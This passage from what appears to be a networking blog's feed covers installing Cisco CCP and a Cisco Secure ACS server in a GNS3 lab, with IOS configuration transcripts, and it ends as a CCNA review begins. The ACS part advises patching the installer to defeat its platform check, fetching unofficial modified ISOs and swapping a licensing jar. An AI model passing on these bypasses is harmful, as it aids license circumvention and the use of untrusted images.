configuration, including operations involving several devices like setting-up
a tunnel.</p>
<p>It comes in two versions:</p>
<ul>
<li>
<p><em><span class="caps">CCP</span> 2.x</em>, also known as <em>Router and Security Device Manager Software (<span class="caps">SDM</span>)</em>,
it is the little brother of <span class="caps">ASDM</span> used to configure <span class="caps">ASA</span> firewalls.
This is a desktop application, the <span class="caps">GUI</span> is installed locally on the user’s host.</p>
</li>
<li>
<p><em><span class="caps">CCP</span> “Express” 3.x</em>: this version is deployed on the Cisco devices themselves
and leverage devices’ <span class="caps">HTTP</span> port to embed a web configuration interface.
<span class="caps">CCP</span> Express already existed in the 2.x generation, at that time two flavors
were available: the <em>“end-user”</em> one with reduced functionalities
(the end-result was very similar to home Internet boxes) and the
<em>“administrator”</em> one.
The current 3.x version only takes over the <em>“administrator”</em> version.</p>
</li>
</ul>
<div class="admonition note">
<p class="admonition-title">Note</p>
<p>For people training for the <a href="/posts/2017/09/01/cisco-ccna-security-certification-review/" title="Cisco CCNA Security certification review"><span class="caps">CCNA</span>-Security certification</a>,
as of writing this post, being comfortable in using <span class="caps">CCP</span> 2.x is mandatory.</p>
<p>As far as I know, <span class="caps">CCP</span> Express 3.x however is out-of-scope.</p>
</div>
<p><span class="caps">CCP</span> is <a href="https://software.cisco.com/download/type.html?mdfid=281795035&catid=null" rel="external" title="Download Software: Configuration Professional (Cisco)">freely downloadable</a> from Cisco website (you only need to register).</p>
<h3 id="ccp-2x-cisco-sdm"><a class="toclink" href="#ccp-2x-cisco-sdm"><span class="caps">CCP</span> 2.x (Cisco <span class="caps">SDM</span>)</a></h3>
<p><span class="lb-small"><a href="#screenshot_ccp2.png" id="screenshot_ccp2.png-thumb" title="Click to enlarge"><img alt="CCP 2.x screenshot" src="https://www.whitewinterwolf.com/posts/2017/08/28/how-to-install-cisco-configuration-professional-ccp-in-gns3/screenshot_ccp2.png"/></a></span></p>
<h4 id="prerequisites-and-installation"><a class="toclink" href="#prerequisites-and-installation">Prerequisites and installation</a></h4>
<p>The latest version currently available is 2.5 and has been published in 2008.
Yet it is still part of the <span class="caps">CCNA</span>-Security curriculum as per Cisco’s
<a href="https://www.amazon.com/CCNA-Security-210-260-Official-Guide/dp/1587205661?tag=electronicfro-20" rel="external" title="CCNA Security 210-260 Official Cert Guide (Amazon)"><span class="caps">CCNA</span>-Security official cert guide</a> which describes its use in
details (but do not cover the deployment).</p>
<p>Now comes the time to check you are well sited.
If your chair is equipped with a sit-belt, make use of it.
If there is any children in the room, please keep them away.
Ah, and let’s add one of those nice red banners too:</p>
<div class="admonition warning">
<p class="admonition-title">Advisory</p>
<p><strong>Gory details follow!</strong></p>
</div>
<p>Still with me? Okay.
<span class="caps">CCP</span> 2.x installation and use is quite straightforward as soon as you
have <em>all</em> the prerequisites right.
I warn you that they are just totally insane, they make my eyes bleed each time I
look at them:</p>
<ul>
<li>I recommend using Windows 7: maybe it works on other system but I did not
try it.</li>
<li>You must use Internet Explorer (no Chrome, Firefox, Edge or whatever).</li>
<li>On <span class="caps">IE</span>, you must enable the <em>Compatibility View</em> mode for the host
<em>127.0.0.1</em> (you can find <span class="caps">IE</span>’s <em>Compatibility View</em> option below the <em>Tools</em>
option in the menu-bar, press the <em>Alt</em> key to display the menu-bar)</li>
<li>You must install the Adobe Flash Player for <span class="caps">IE</span> (no particular prerequisite
on Flash Player version, the latest should be fine).</li>
<li>You must use the obsolete and unsupported Java 1.6 (don’t try any newer
version, it won’t work), use the 32 bits version even on 64 bits systems
as this is usually the only one supported by browsers.
Old Java releases can be found in the
<a href="http://www.oracle.com/technetwork/java/javase/downloads/java-archive-downloads-javase6-419409.html" rel="external" title="Java SE 6 Downloads (Oracle)">Java Archives page</a>, the binary I’m using is named
<em>jre-6u45-windows-i586.exe</em>.</li>
<li>In Java properties (usually accessible through either an icon in the
notification bar or an icon in Windows Control Panel), add the parameter
<code>-Xmx512m</code> to increase the Heap Memory size allocatable by <span class="caps">CCP</span> as the
default is too low.</li>
<li>If you are using the <span class="caps">EMET</span> security tool, disable or uninstall it as it
interferes with <span class="caps">CCP</span> processing.</li>
<li>Once <span class="caps">CCP</span> has been installed, copy its shortcut on your desktop and in its
<em>Advanced</em> properties tick the checkbox to make it always run with the local
Administrator privileges.</li>
</ul>
<p>So, to summarize, <span class="caps">CCP</span> is a simple <span class="caps">GUI</span> sending <span class="caps">TCP</span> requests to remote <span class="caps">IOS</span> devices,
and to do this it requires both Flash and an obsolete version of Java,
disabling security features on the browser and on the system, and be run as
administrator.
<em>“Security Device Manager”</em> they call it, yeah!</p>
<p>Once you satisfy all prerequisites, the installation is straightforward.</p>
<h4 id="devices-preparation"><a class="toclink" href="#devices-preparation">Devices preparation</a></h4>
<p>First, connect the Windows host running <span class="caps">CCP</span> to a device to configure, here a router:</p>
<p><span class="lb-small"><a href="#topology.png" id="topology.png-thumb" title="Click to enlarge"><img alt="Topology linking the Windows CCP host to a router" src="https://www.whitewinterwolf.com/posts/2017/08/28/how-to-install-cisco-configuration-professional-ccp-in-gns3/topology.png"/></a></span></p>
<div class="admonition note">
<p class="admonition-title">Note</p>
<p>A <span class="caps">VM</span> node must be shut down to be able to edit its network links.</p>
<p>If you want to be gain more flexibility, just add a basic <span class="caps">GNS3</span> switch
between the Windows host and the router: you won’t need to shutdown the
Windows host anymore when changing the devices connected to the switch.</p>
</div>
<p><span class="caps">CCP</span> requires both a command-line and <span class="caps">HTTP</span>(S) access to the device.
After having configured the network interface, you must create an account and
start the <span class="caps">HTTP</span> service.</p>
<p>Here is the typescript showing a quick device configuration:</p>
<div class="codehilite"><pre><span class="gp">R1#</span><span class="k">conf</span> t
<span class="go">Enter configuration commands, one per line. End with CNTL/Z.</span>
<span class="gp">R1(config)#</span><span class="k">int</span><span class="s"> fa0/0</span>
<span class="gp">R1(config-if)#</span><span class="k">ip</span> add <span class="s">192.168.0.11</span> <span class="s">255.255.255.0</span>
<span class="gp">R1(config-if)#</span><span class="ow">no </span><span class="k">shut</span>
<span class="gp">R1(config-if)#</span>
<span class="gt">*Mar 1 00:01:09.039: %LINK-3-UPDOWN: Interface FastEthernet0/0, changed state to up</span>
<span class="gt">*Mar 1 00:01:10.039: %LINEPROTO-5-UPDOWN: Line protocol on Interface FastEthernet0/0, changed state to up</span>
<span class="gp">R1(config-if)#</span><span class="nb">exit</span>
<span class="gp">R1(config)#</span><span class="k">username</span> admin privilege <span class="s">15</span> secret Cisco123
<span class="gp">R1(config)#</span><span class="k">ip</span> http secure-server
<span class="go">% Generating 1024 bit RSA keys, keys will be non-exportable...[OK]</span>
<span class="gp">R1(config)#</span>
<span class="gt">*Mar 1 00:01:47.247: %SSH-5-ENABLED: SSH 1.99 has been enabled</span>
<span class="gp">R1(config)#</span>
<span class="gt">*Mar 1 00:01:47.331: %PKI-4-NOAUTOSAVE: Configuration was modified. Issue "write memory" to save new certificate</span>
<span class="gp">R1(config)#</span><span class="k">ip</span> http authentication local
<span class="gp">R1(config)#</span><span class="nb">exit</span>
<span class="gp">R1#</span>
<span class="gt">*Mar 1 00:02:07.791: %SYS-5-CONFIG_I: Configured from console by console</span>
<span class="gp">R1#</span><span class="k">copy</span> run start
<span class="go">Destination filename [startup-config]?</span>
<span class="go">Building configuration...</span>
<span class="go">[OK]</span>
<span class="gp">R1#</span>
</pre></div>
<div class="admonition note">
<p class="admonition-title">Note</p>
<p>In this example I use <code>ip http secure-server</code> to enable <span class="caps">HTTPS</span> communication
between <span class="caps">CCP</span> and the device.</p>
<p><span class="caps">CCP</span> also supports plain-<span class="caps">HTTP</span> communication, use <code>ip http server</code> in this
case.
Beware in this case that the communication between <span class="caps">CCP</span> and the device
transits in clear form over the network and can be potentially intercepted
or altered.</p>
</div>
<h4 id="ccp-initialization"><a class="toclink" href="#ccp-initialization"><span class="caps">CCP</span> initialization</a></h4>
<p>When you start <span class="caps">CCP</span>, you are first presented what looks like a login window:</p>
<p><span class="lb-small"><a href="#cco_auth.png" id="cco_auth.png-thumb" title="Click to enlarge"><img alt="Cisco CCO authentication window" src="https://www.whitewinterwolf.com/posts/2017/08/28/how-to-install-cisco-configuration-professional-ccp-in-gns3/cco_auth.png"/></a></span></p>
<p>Just clicking <em><span class="caps">OK</span></em> doesn’t work, my first reflex was to search to <span class="caps">CCP</span> default
password.
Actually, this window asks you for your Cisco Connection Online (<span class="caps">CCO</span>)
credential, and is an optional step only to allow <span class="caps">CCP</span> to send usage reports to Cisco.</p>
<p>Just <em>Cancel</em> or untick the <em>Enable</em> checkbox.</p>
<p>You are then asked for your devices IPs and credentials.</p>
<p><span class="lb-small"><a href="#community.png" id="community.png-thumb" title="Click to enlarge"><img alt="Community management window" src="https://www.whitewinterwolf.com/posts/2017/08/28/how-to-install-cisco-configuration-professional-ccp-in-gns3/community.png"/></a></span></p>
<p>Filling this window is straightforward.
Check the <em>Connect Securely</em> for devices where you enabled <span class="caps">HTTPS</span>.</p>
<p>Don’t forget to check the <em>Discover all devices</em> in the bottom left corner
to automatically launch the discovery on all devices as soon as you press the
<em><span class="caps">OK</span></em> button.
If you forget to check it, this is not a big deal: on the next screen simply
select your devices (use <em>Ctrl</em> or <em>Shift</em> to select several devices at once)
and click on the <em>Discover</em> button at the bottom to manually launch the same operation.</p>
<div class="admonition note">
<p class="admonition-title">Note</p>
<p><span class="caps">CCP</span> does not store devices properties in its database.
On each start you need it to <em>discover</em> them: <span class="caps">CCP</span> connects to the
devices, detect their type and collect all relevant properties.</p>
<p>When using devices virtualized in <span class="caps">GNS3</span> using common <span class="caps">IOS</span> images, you may
have a <em>“Discovered with warnings”</em> status.
Clicking on the <em>Discovery details</em> button usually tells that the warning
is generated because the device is not supported by <span class="caps">CCP</span> and that some
functionality may not behave as expected.</p>
<p>This is a normal message and personally I never encountered any odd behavior.</p>
</div>
<h3 id="ccp-express-3x"><a class="toclink" href="#ccp-express-3x"><span class="caps">CCP</span> “Express” 3.x</a></h3>
<p><span class="lb-small"><a href="#screenshot_ccp3.jpg" id="screenshot_ccp3.jpg-thumb" title="Click to enlarge"><img alt="CCP Express 3.x screenshot" src="https://www.whitewinterwolf.com/posts/2017/08/28/how-to-install-cisco-configuration-professional-ccp-in-gns3/screenshot_ccp3.jpg"/></a></span></p>
<p>This one is more regularly maintained, nevertheless I did not managed to
install it due to errors potentially related to the <span class="caps">GNS3</span> virtualization environment.</p>
<p>The installation process is <a href="https://www.cisco.com/c/en/us/td/docs/net_mgmt/cisco_configuration_professional_express/v3_1/guides/adminguide/CCP_admin_guide/installing_ccp_express_adminview.html" rel="external" title="Cisco Configuration Professional Express 3.1 Administration Guide (Cisco)">documented by Cisco</a>, but it
<a href="https://learningnetwork.cisco.com/thread/51677" rel="external" title="copying multiple config files (The Cisco Learning Network forum)">doesn’t work</a> first because <span class="caps">IOS</span> fails to simultaneously read and
write to its flash memory.
To decompress the installation archive, you must therefore read it directly
from the <span class="caps">TFTP</span> server instead of copying to the flash memory first:</p>
<div class="codehilite"><pre><span class="gp">R1# </span><span class="k">archive</span> tar /xtract <span class="s">tftp://192.168.0.100/ccpexpressAdmin_3_1_2_en.tar</span> flash<span class="s">:</span>
</pre></div>
<p>However the installation process then fails on the following step due to too
long file names:</p>
<div class="codehilite"><pre>Error opening flash:/ccpexp/CCPExpress_3.1_Open_Source_Documentation.html (File name too long)
</pre></div>
<p>According to the linked <a href="https://learningnetwork.cisco.com/thread/51677" rel="external" title="copying multiple config files (The Cisco Learning Network forum)">forum thread</a>, these issues seem to be
specific to <span class="caps">GNS3</span> environment (maybe because of <span class="caps">GNS3</span> itself, or maybe because
using <span class="caps">GNS3</span> usually means using old obsolete <span class="caps">IOS</span> images).
<em>In theory</em>, you should not encounter such issues with real gears.</p>
<p>I did not investigate this any further yet.</p>How to install Cisco Secure Access Control System (ACS) server in GNS32017-08-28T00:00:00+02:002017-08-28T00:00:00+02:00WhiteWinterWolftag:www.whitewinterwolf.com,2017-08-28:/posts/2017/08/28/how-to-install-cisco-secure-access-control-system-acs-server-in-gns3/<p>Cisco Secure <a href="https://www.cisco.com/c/en/us/products/security/secure-access-control-system/index.html" rel="external" title="Cisco Secure Access Control System homepage (Cisco)">Access Control System</a> (<span class="caps">ACS</span> or <span class="caps">CSACS</span>) server is
Cisco’s Authentication, Authorization and Accounting (<span class="caps">AAA</span>) server, allowing to
centralize network devices users permissions and auditing.</p>
<p>It supports <abbr title="Terminal Access Control Access Control Server"><span class="caps">TACACS</span></abbr>+ (Cisco proprietary) and <abbr title="Remote Authentication Dial-In User Service"><span class="caps">RADIUS</span></abbr> (open standard, usable with
non-Cisco devices) protocols.
It has its own users store, which is useful for lab tests, but in real life it
will most likely be connected to a Microsoft Active Directory server to
centralize users credential management.</p>
<div class="admonition note">
<p class="admonition-title">Note</p>
<p><span class="caps">ACS</span> is in the process of being replaced by its successor
<em><a href="https://www.cisco.com/c/en/us/products/security/identity-services-engine/index.html" rel="external" title="Cisco Identity Services Engine homepage (Cisco)">Identity Service Engine (<span class="caps">ISE</span>)</a></em>.</p>
<p>For some time, the two products were to be used together, with <span class="caps">ACS</span> handling
authentication and authorization while <span class="caps">ISE</span> was focusing on hosts
policy-compliance checking.</p>
<p>For <span class="caps">CCNA</span>-Security students, as for now only <span class="caps">ACS</span> is really covered by the
curriculum.
<span class="caps">ISE</span> is just mentioned from time to time so you know what it is and why it
is used.</p>
</div>
<p>Evaluation …</p><p>Cisco Secure <a href="https://www.cisco.com/c/en/us/products/security/secure-access-control-system/index.html" rel="external" title="Cisco Secure Access Control System homepage (Cisco)">Access Control System</a> (<span class="caps">ACS</span> or <span class="caps">CSACS</span>) server is
Cisco’s Authentication, Authorization and Accounting (<span class="caps">AAA</span>) server, allowing to
centralize network devices users permissions and auditing.</p>
<p>It supports <abbr title="Terminal Access Control Access Control Server"><span class="caps">TACACS</span></abbr>+ (Cisco proprietary) and <abbr title="Remote Authentication Dial-In User Service"><span class="caps">RADIUS</span></abbr> (open standard, usable with
non-Cisco devices) protocols.
It has its own users store, which is useful for lab tests, but in real life it
will most likely be connected to a Microsoft Active Directory server to
centralize users credential management.</p>
<div class="admonition note">
<p class="admonition-title">Note</p>
<p><span class="caps">ACS</span> is in the process of being replaced by its successor
<em><a href="https://www.cisco.com/c/en/us/products/security/identity-services-engine/index.html" rel="external" title="Cisco Identity Services Engine homepage (Cisco)">Identity Service Engine (<span class="caps">ISE</span>)</a></em>.</p>
<p>For some time, the two products were to be used together, with <span class="caps">ACS</span> handling
authentication and authorization while <span class="caps">ISE</span> was focusing on hosts
policy-compliance checking.</p>
<p>For <span class="caps">CCNA</span>-Security students, as for now only <span class="caps">ACS</span> is really covered by the
curriculum.
<span class="caps">ISE</span> is just mentioned from time to time so you know what it is and why it
is used.</p>
</div>
<p>Evaluation versions of <span class="caps">ACS</span> can usually be obtained by contacting your Cisco
sales representative.<sup id="fnref-get-acs"><a class="footnote-ref" href="#fn-get-acs">1</a></sup></p>
<h3 id="prerequisites"><a class="toclink" href="#prerequisites">Prerequisites</a></h3>
<p>To install an <span class="caps">ACS</span> server, you will need the following things:</p>
<ul>
<li>
<p>The <em><span class="caps">ACS</span> installation <span class="caps">DVD</span></em>.</p>
<p>This <span class="caps">DVD</span> weights around <span class="caps">1GB</span> and contains an heavily modified version of
CentOS (by-the-way there is an <a href="https://routerjockey.com/2013/10/21/installing-vmware-tools-on-cisco-acs/" rel="external" title="Installing VMware tools on Cisco ACS (RouterJockey)">unofficial patch</a> allowing to get
a full-blown Bash shell on your <span class="caps">ACS</span> server).</p>
<p>Do not confuse it with the older <em><span class="caps">ACS</span> for Windows</em> disc which weighted
around 100 <span class="caps">MB</span>.
It was used to install an <span class="caps">ACS</span> server on a Windows machine, but this version
of <span class="caps">ACS</span> server is not supported anymore and is now part of history.</p>
</li>
<li>
<p>The <em><span class="caps">ACS</span> license files</em> (*<em>.lic</em> files).</p>
</li>
</ul>
<p><span class="caps">ACS</span> actively checks the hardware while booting and refuses to work in a
non-supported environment (either a physical Cisco appliance or a VMware ESXi server).</p>
<p>In theory, this should also work in VMware Player environment as the result
should be very close to an ESXi from the guest point-of-view.
<span class="caps">ACS</span> indeed doesn’t complain, network adapters are correctly recognized, but trying
to assign them an <span class="caps">IP</span> address has no effect making the whole thing unusable.</p>
<p>In order to have a Cisco <span class="caps">ACS</span> server in our lab, we will therefore need<sup id="fnref-esxi"><a class="footnote-ref" href="#fn-esxi">2</a></sup>
to use a Qemu virtual machine and modify <span class="caps">ACS</span> installation packages to bypass
the platform check.</p>
<h3 id="installation-process"><a class="toclink" href="#installation-process">Installation process</a></h3>
<h4 id="create-the-blank-template-node"><a class="toclink" href="#create-the-blank-template-node">Create the blank template node</a></h4>
<p>As stated earlier, the Cisco <span class="caps">ACS</span> server actively checks that the platforms on
which it is running matches the officially supported platforms.
In order to install it under Qemu, you therefore need to modify the Cisco <span class="caps">ACS</span>
installation image to remove this check:</p>
<ul>
<li>The operation can be done <a href="http://www.securesenses.net/2012/07/installing-cisco-secure-acs-53-in.html" rel="external" title="Installing Cisco Secure ACS 5.3 in VirtualBox (SecureSense blog)">manually</a>, but it is quite complex.</li>
<li>If you are lucky, you may find already modified unofficial <span class="caps">ISO</span> images
floating around (*<em>_any_server.iso</em> files).</li>
</ul>
<p>The installation itself is straightforward.
In <span class="caps">GNS3</span>, go in <em>Edit</em> > <em>Preferences</em> to open the <em>Preferences</em> screen, then
create a new <span class="caps">QEMU</span> virtual machine with the following properties:</p>
<ul>
<li><em><span class="caps">RAM</span></em>: 4096 <span class="caps">MB</span></li>
<li><em>Disk image (hda)</em>: <em>Create</em> a new one, set its size to 60 000 MiB.</li>
</ul>
<p>Once the template device has been created, edit its settings:</p>
<ul>
<li><em>General</em> tab:<ul>
<li><em>Symbol</em>: set it to <em>access_server</em></li>
<li><em>Category</em>: <em>Security devices</em></li>
<li><em><span class="caps">RAM</span></em>: 4096 <span class="caps">MB</span></li>
<li><em>vCPUs</em>: 2</li>
</ul>
</li>
<li><em><span class="caps">CD</span>/<span class="caps">DVD</span></em> tab:<ul>
<li>Locate your <span class="caps">ACS</span> installation <span class="caps">DVD</span> image, there is no need to copy
it as it will be used only for the installation.</li>
</ul>
</li>
<li><em>Advanced</em><ul>
<li><em>Use as linked base <span class="caps">VM</span></em>: <span class="caps">NO</span> (we will re-enable this after the
installation, <a href="http://127.0.0.1:8000/posts/2017/08/14/gns3-how-to-add-virtual-machines-end-devices-nodes/#linked-base-vms" rel="external" title="How to add virtual machines: Linked base VMs">more information on linked base VMs</a>).</li>
</ul>
</li>
</ul>
<h4 id="install-the-acs-server"><a class="toclink" href="#install-the-acs-server">Install the <span class="caps">ACS</span> server</a></h4>
<p>Create the new topology below, using a <span class="caps">GNS3</span> basic switch to connect your newly
created device with a Windows guest we will use as management host.</p>
<p><span class="lb-small"><a href="#topology.png" id="topology.png-thumb" title="Click to enlarge"><img alt="Topology including an ACS server, a basic switch and a Windows host" src="https://www.whitewinterwolf.com/posts/2017/08/28/how-to-install-cisco-secure-access-control-system-acs-server-in-gns3/topology.png"/></a></span></p>
<p>Start the <span class="caps">ACS</span> device, open its console and type <code>2</code> followed by the <em>Entrer</em>
key to start the installation.</p>
<div class="admonition note">
<p class="admonition-title">Note</p>
<p>What is this mysterious “2”?</p>
<p>Depending on your environment, Grub boot menu may not be visible on your
console so you are actually blindly choosing Grub’s second menu option.</p>
<p>Here is the actual Grub boot menu:</p>
<div class="codehilite"><pre>Available boot options:
[1] Cisco Secure ACS 5.2 Installation (Keyboard/Monitor)
[2] Cisco Secure ACS 5.2 Installation (Serial/Console)
[3] Reset Administrator Password (Keyboard/Monitor)
[4] Reset Administrator Password (Serial Console)
<Enter> Boot from hard disk
</pre></div>
<p>Selecting <em>2</em> thus allows to start the installation using the serial console.</p>
<p>You can enable the monitor by editing the device settings and switching the
<em>Console type</em> to <em>vnc</em> and removing <em>-nographic</em> from the <em>Options</em> under
the <em>Advanced</em> tab, but you may then encounter keyboard layout issues
(<span class="caps">ACS</span> only supports the <span class="caps">US</span> keyboard layout) and you will not be able to
copy-paste the terminal content.</p>
<p>It is also worth noting the presence of the Administrator password reset
utilities, as attempting to directly change his password from the
<em>/etc/shadow</em> file won’t work (the content of this file is automatically
overwritten during each boot from the <span class="caps">ACS</span> internal users database).</p>
</div>
<p>The installation process first copies the operating system files to the
hard-disk, reboots, then ask for a few settings and at last install the <span class="caps">ACS</span>
application (don’t worry if you do not have a valid gateway of name server to
provide: just give it some random <span class="caps">IP</span> address).</p>
<p>After the last install round, the <span class="caps">ACS</span> will finally restart.
Be aware that this restart may take a <em>very</em> long time (expect something like
a dozen of minutes).</p>
<div class="admonition note">
<p class="admonition-title">Note</p>
<p>Randomly, the <em>“acs login:”</em> prompt may appear right at the beginning of the
booting sequence and seem frozen: this is normal, be patient, a new prompt
appears once <span class="caps">ACS</span> has effectively started.</p>
</div>
<p>If everything went normally, at the end of this starting sequence you should
get a login prompt allowing you to login.</p>
<p>Login as <em>admin</em>, then shutdown <span class="caps">ACS</span> using the <code>halt</code> command, accept to save
the configuration:</p>
<div class="codehilite"><pre><span class="gp">acs/admin# </span><span class="k">halt</span>
<span class="go">Do you want to save the current configuration ? (yes/no) [yes] ?</span>
<span class="go">Generating configuration...</span>
<span class="go">Saved the running configuration to startup successfully</span>
<span class="go">Continue with shutdown? [y/n] </span><span class="s">y</span>
<span class="go">Broadcast message from root (ttyS0) (Sun Aug 27 15:58:48 2017):</span>
<span class="go">The system is going down for system halt NOW!</span>
</pre></div>
<div class="admonition note">
<p class="admonition-title">Note</p>
<p>Cleanly shutting down the <span class="caps">ACS</span> server is only possible this way.</p>
<p>Previous versions of the <span class="caps">ACS</span> server used to provide this functionality also
from the web interface but this has now been removed.</p>
</div>
<h4 id="update-acs-server-files"><a class="toclink" href="#update-acs-server-files">Update <span class="caps">ACS</span> server files</a></h4>
<p>Depending on the installation media you used, you may have to replace some
files after the installation and before using the <span class="caps">ACS</span> server.
Check any accompanying documentation and ReadMe files.
The most universal and safe way to do this is to use <a href="http://libguestfs.org/" rel="external" title="libguestfs project homepage">libguestfs</a> tools.
These tools allow you to access the content of virtual machine hard-disk image,
it supports various image formats and mitigation measures against malicious
disk images.</p>
<p>If you do not have installed them yet, you should find them in your package
repository. To install libguestfs tools on Debian, use:</p>
<div class="codehilite"><pre>sudo aptitude install libguestfs-tools
</pre></div>
<p>The example command below modifies the <em><span class="caps">ACS</span>-hda.qcow</em> disk image and replaces
the file <em>flexlm-10.9.jar</em> located in the <span class="caps">ACS</span> server Apache Tomcat libraries
with one located on the host system:</p>
<div class="codehilite"><pre>virt-copy-in -a ~/GNS3/images/QEMU/ACS-hda.qcow2 ./flexlm-10.9.jar \
/opt/CSCOacs/mgmt/apache-tomcat-6.0.18/lib
</pre></div>
<div class="admonition warning">
<p class="admonition-title">Warning</p>
<p>Always double-check that the device is fully shut down before modifying its
hard-disk image!</p>
<p>A concurrent write access to the disk image of a running virtual machine
nearly certainly means an irremediable corruption of the image.</p>
</div>
<h4 id="prepare-the-windows-management-host"><a class="toclink" href="#prepare-the-windows-management-host">Prepare the Windows management host</a></h4>
<p>If you haven’t copied the <span class="caps">ACS</span> license file into you Windows host yet, this is
now the time to do it.
A convenient way to transfer them to your lab guests is to put them in an
<span class="caps">ISO</span> image which will be mounted by the guest.</p>
<p>I use <code>genisoimage</code> to generate such images.
If it not already installed in your environment, install it (the exact
command depends on your distribution):</p>
<div class="hilitewrapper"><table class="codehilitetable"><tr><td class="linenos"><div class="linenodiv"><pre>1</pre></div></td><td class="code"><div class="codehilite"><pre>sudo aptitude install genisoimage
</pre></div>
</td></tr></table></div>
<p>Use the following command to create an <span class="caps">ISO</span> image containing all *<em>.lic</em> files:</p>
<div class="hilitewrapper"><table class="codehilitetable"><tr><td class="linenos"><div class="linenodiv"><pre>1</pre></div></td><td class="code"><div class="codehilite"><pre>genisoimage -JR -o licences.iso *.lic
</pre></div>
</td></tr></table></div>
<p>Edit your Windows device settings, mount this <span class="caps">ISO</span> file in the <span class="caps">CD</span>-<span class="caps">ROM</span> drive, and
start your Windows host.</p>
<h4 id="acs-server-configuration"><a class="toclink" href="#acs-server-configuration"><span class="caps">ACS</span> server configuration</a></h4>
<p>Start the <span class="caps">ACS</span> server.
As previously: open its console, and be patient for the login prompt to appear.</p>
<p>Once started, thee <span class="caps">ACS</span> server should be pingable from the Windows host.
If this is not the case from the <span class="caps">EXEC</span> prompt use the <code>show interfaces</code> command
to check the network settings.</p>
<p>To modify the network settings:</p>
<div class="codehilite"><pre><span class="gp">acs/admin# </span><span class="k">conf</span> t
<span class="go">Enter configuration commands, one per line. End with CNTL/Z.</span>
<span class="gp">acs/admin(config)# </span><span class="k">int</span><span class="s"> gi 0</span>
<span class="gp">acs/admin(config-GigabitEthernet)# </span><span class="k">ip</span> add <span class="s">192.168.0.1</span> <span class="s">255.255.255.0</span>
<span class="go">Changing the hostname or IP may result in undesired side effects,</span>
<span class="go">such as installed application(s) being restarted.</span>
<span class="go">Are you sure you want to proceed? [y/n] y</span>
<span class="go">[truncated]</span>
<span class="gp">acs/admin(config-GigabitEthernet)# </span><span class="nb">exit</span>
<span class="gp">acs/admin(config)# </span><span class="nb">exit</span>
<span class="gp">acs/admin#</span>
</pre></div>
<div class="admonition note">
<p class="admonition-title">Note</p>
<p>You must type <code>int gi 0</code> even if the interface shows-up as <em>eth0</em> in the
output of <code>show interfaces</code>.
As always, don’t ask me why, ask Cisco…</p>
</div>
<p>To check if all services are correctly started:</p>
<div class="codehilite"><pre><span class="gp">acs/admin# </span><span class="k">show</span> application status acs
<span class="go">ACS role: PRIMARY</span>
<span class="go">Process 'database' running</span>
<span class="go">Process 'management' running</span>
<span class="go">Process 'runtime' running</span>
<span class="go">Process 'view-database' running</span>
<span class="go">Process 'view-jobmanager' running</span>
<span class="go">Process 'view-alertmanager' running</span>
<span class="go">Process 'view-collector' running</span>
<span class="go">Process 'view-logprocessor' running</span>
<span class="gp">acs/admin#</span>
</pre></div>
<p>To make changes persistent across reboots, use:</p>
<div class="codehilite"><pre><span class="gp">acs/admin# </span><span class="k">copy</span> run start
<span class="go">Generating configuration...</span>
<span class="gp">acs/admin#</span>
</pre></div>
<p>On the Windows host, open a browser and access <span class="caps">ACS</span> web interface through <span class="caps">HTTPS</span>
(<em>https://192.168.0.10</em>).</p>
<p>The <span class="caps">ACS</span> default account is <em>ACSAdmin</em> with the literal string <em>default</em> as
password (the <span class="caps">CLI</span> and Web interface administrator accounts are unrelated):</p>
<table>
<thead>
<tr>
<th>Interface</th>
<th>Login</th>
<th>Password</th>
</tr>
</thead>
<tbody>
<tr>
<td><strong><span class="caps">CLI</span> (console)</strong></td>
<td>admin</td>
<td><em>Set during the installation.</em></td>
</tr>
<tr>
<td><strong>Web (administration)</strong></td>
<td>ACSAdmin</td>
<td>default</td>
</tr>
</tbody>
</table>
<p>On the first access to the web interface, you will have to change the default
password and upload your license files.</p>
<p>When accessing the <span class="caps">ACS</span> web interface from Internet Explorer 11, the
<em>Compatibility view</em> mode must be enabled otherwise some pages won’t work
(for instance <em>Access Policies</em> > <em>Access Services</em> > <em>Default Device Admin</em> >
<em>Authorization</em>).
Press the <em>Alt</em> key, the <em>Compatbility view</em> option should be available below
the <em>Tools</em> toolbar option, add the <span class="caps">ACS</span> server address to the list.</p>
<p><span class="lb-small"><a href="#welcome.png" id="welcome.png-thumb" title="Click to enlarge"><img alt="ACS server welcome screen" src="https://www.whitewinterwolf.com/posts/2017/08/28/how-to-install-cisco-secure-access-control-system-acs-server-in-gns3/welcome.png"/></a></span></p>
<h4 id="post-install"><a class="toclink" href="#post-install">Post-install</a></h4>
<p>Now that the installation is complete, don’t forget to modify the following
settings in the <span class="caps">ACS</span> template device:</p>
<ul>
<li><em><span class="caps">CD</span>/<span class="caps">DVD</span></em> tab:<ul>
<li><em>Image</em>: set it blank, otherwise <span class="caps">ACS</span> devices may refuse to start
when you move or rename the <span class="caps">ISO</span> file.</li>
</ul>
</li>
<li><em>Advanced settings</em>:<ul>
<li><em>Use as a linked base <span class="caps">VM</span></em>: Yes.</li>
</ul>
</li>
</ul>
<div class="footnote">
<hr/>
<ol>
<li id="fn-get-acs">
<p>Am I aware that a large number of <span class="caps">CCNA</span> Security students do not
have a <em>“Cisco sales representative”</em>?
Yes, but Cisco do not seem to care.
Having access to an <span class="caps">ACS</span> server is mandatory to get your exam, you’re on your
own to figure out how to get one… <a class="footnote-backref" href="#fnref-get-acs" title="Jump back to footnote 1 in the text">↩</a></p>
</li>
<li id="fn-esxi">
<p>Note that ESXi can be freely downloaded from Cisco website, so this
“need” is merely a consequence of the choices you made when building your
virtual lab.
<a href="/posts/2017/08/11/how-to-build-a-virtual-pentest-lab/#software_1">More information</a>. <a class="footnote-backref" href="#fnref-esxi" title="Jump back to footnote 2 in the text">↩</a></p>
</li>
</ol>
</div>Cisco CCNA Routing & Switching certification review2017-08-21T00:00:00+02:002017-08-21T00:00:00+02:00WhiteWinterWolftag:www.whitewinterwolf.com,2017-08-21:/posts/2017/08/21/ccna-routing-switching-certification-review/<h3>The five Ws</h3>
<ul>
<li>
<p><strong>What</strong>:
<span class="caps">CCNA</span> Routing <span class="amp">&</span> Switching is a technical certification about
enterprise-grade <span class="caps">IT</span> networking from Cisco.
It covers the involved devices, protocols and how to implement them
using Cisco technologies.</p>
</li>
<li>
<p><strong>When</strong>:
This is an entry-level certification with no prerequisite.</p>
</li>
<li>
<p><strong>Why</strong>:
This certification demonstrate a good level of familiarity with
enterprise networks and Cisco’s <span class="caps">IOS</span>-based devices.</p>
<p>It is a de-facto standard in terms of <span class="caps">IT</span> networking certification, valuable
even for employers using different technologies than Cisco, and
is also a prerequisite for several other Cisco certifications.</p>
<div class="admonition note">
